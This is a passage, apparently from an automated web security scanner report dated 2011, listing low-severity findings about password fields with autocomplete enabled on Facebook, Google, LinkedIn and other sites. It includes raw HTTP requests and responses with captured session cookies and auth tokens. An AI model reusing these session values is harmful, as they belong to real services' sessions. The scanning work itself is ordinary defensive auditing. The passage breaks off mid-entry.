X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

14.20. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

14.21. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=98b457a4a7f44659396f2125549c905d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 98b457a4a7f44659396f2125549c905d=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

14.22. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

14.23. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/tutorials.html" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

14.24. http://www.ericmmartin.com/projects/simplemodal/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 20:01:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34911


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<div id="simplemodal-login-form" style="display:none">
   <form name="loginform" id="loginform" action="http://www.ericmmartin.com/wordpress/wp-login.php" method="post">
       <div class="title">
...[SNIP]...
<br />
           <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

14.25. http://www.facebook.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:20 GMT
Content-Length: 30803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" id="reg_instance" name="reg_instance" value="4CJLTU3g78dbIxk8o4MmRVF4" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

14.26. http://www.facebook.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:20 GMT
Content-Length: 30803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

14.27. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:29 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

14.28. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:39 GMT
Content-Length: 10796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1&amp;display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

14.29. http://www.facebook.com/supermediacom  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /supermediacom

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /supermediacom HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:37 GMT
Content-Length: 146681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

14.30. https://www.google.com/accounts/Login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=p2zNnJZpTnA;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 21:55:57 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10833
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

14.31. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=hB-ORbAny80;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 21:56:03 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

14.32. http://www.linkedin.com/shareArticle  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:ZvpYDWFtWOPUWYjh_jHyedipSluAqpcn6vhruIXa2CDdWVdPpP66g5:1296760855:7d27a506e0853359e3965f871f95b1bfef8c45d6"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 19:50:54 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:0561599565067721010"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: bcookie="v=1&695a9322-0059-4252-9172-662df4a2e00f"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 7453
Date: Thu, 03 Feb 2011 19:20:54 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965045525d5f4f58455e445a4a42198c;expires=Thu, 03-Feb-2011 19:51:08 GMT;path=/;httponly

<!DOCTYPE html>
<html lang="en">
<head>


<title>LinkedIn Sign In | LinkedIn</title>

...[SNIP]...
</a>


<form action="https://www.linkedin.com/secure/login" method="POST" accept-charset="UTF-8" name="login"> <input type="hidden" name="csrfToken" value="ajax:0561599565067721010">
...[SNIP]...
<div class="elem">
<input type="password" name="session_password" value="" id="session_password-login" class="inpt">
</div>
...[SNIP]...

14.33. http://www.made-in-china.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.made-in-china.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.made-in-china.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:28:13 GMT
Server: Apache
Cache-Control: private
Set-Cookie: sf_img=AM; domain=.made-in-china.com; path=/; expires=Fri, 03-Feb-2012 20:28:13 GMT
Set-Cookie: cid=jAxMTAyMDQwNDI4MTM4NjMwMDA6MDE3MTM0NDI4NzEyMzU4MTU1MTEM; domain=.made-in-china.com; path=/
Set-Cookie: sid=TE5OTQ5MTE5NTgzMjI5MzoxNzMuMTkzLjIxNC4yNDMO; domain=.made-in-china.com; path=/
Set-Cookie: JSESSIONID=aYL_X1GnJqlf; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=GBK
Content-Length: 98587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="
...[SNIP]...
<div id="signA" style="display: block;">
<form action="http://membercenter.made-in-china.com/logon.do" name="logon" method="post">
<input type="hidden" name="xcase" value="doLogon" />
...[SNIP]...
</label>
<input type="password" name="logonInfo.logPassword" />
    <p class="capsLock hide">
...[SNIP]...

14.34. http://www.manta.com/c/mm49ryk/a-b-c-development-company-inc/x22  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manta.com
Path:   /c/mm49ryk/a-b-c-development-company-inc/x22

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 20:28:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-UA-Compatible: IE=EmulateIE8
Vary: Accept-Encoding
Set-Cookie: tcc=one; path=/
Set-Cookie: abtest_v=version&7&site_wide&claimbutton.control; path=/
Set-Cookie: member_session=UmFuZG9tSVZDXysA%5BS%5DCWsGpZJaj0sDqAt3Qj8AAoQFPbOBf7rrCY6lYGPtsEyTlueYzU4Ng64mj5DmsgbfcWNKrZGp6UV3Ll5u5Muh5b8JEtFGe%5BP%5DaEKWvw65AHkGWteILjBVuFz1jjWqjy7LZBTvEvbx5XbZZF03hS7b9DVF6ff%5BS%5DlZoIt%5BS%5Drr3OPqRmO5DeRFflwRyOUZWc5e4K62A7xN6lkweT2Glj9fUIgXkFAVckBCEgTy7H%5BP%5DluqEDQwHIte54Cei0DtflweKRv6pQGPHbAKA%5BE%5D%5BE%5D; domain=.manta.com; path=/; expires=Sat, 05-Mar-2011 20:28:16 GMT
Set-Cookie: refer_id=0000; domain=.manta.com; path=/
Set-Cookie: refer_id_persistent=0000; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:16 GMT
Set-Cookie: cust_id=1296764896.830343-519; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:16 GMT
Via: 1.0 www.manta.com
Content-Length: 52215
X-Varnish: 1847049511
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>A B C Development
...[SNIP]...
<div class="form-login">                    <form action="https://www.manta.com/member/login/" method="post" id="top_login_form">
                   <fieldset>
...[SNIP]...
<span><input id="password" name="password" title="password" type="password" class="top_login_password" /></span>
...[SNIP]...

14.35. http://www.manta.com/c/mm8136k/abc-development-inc/x22  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manta.com
Path:   /c/mm8136k/abc-development-inc/x22

Issue detail

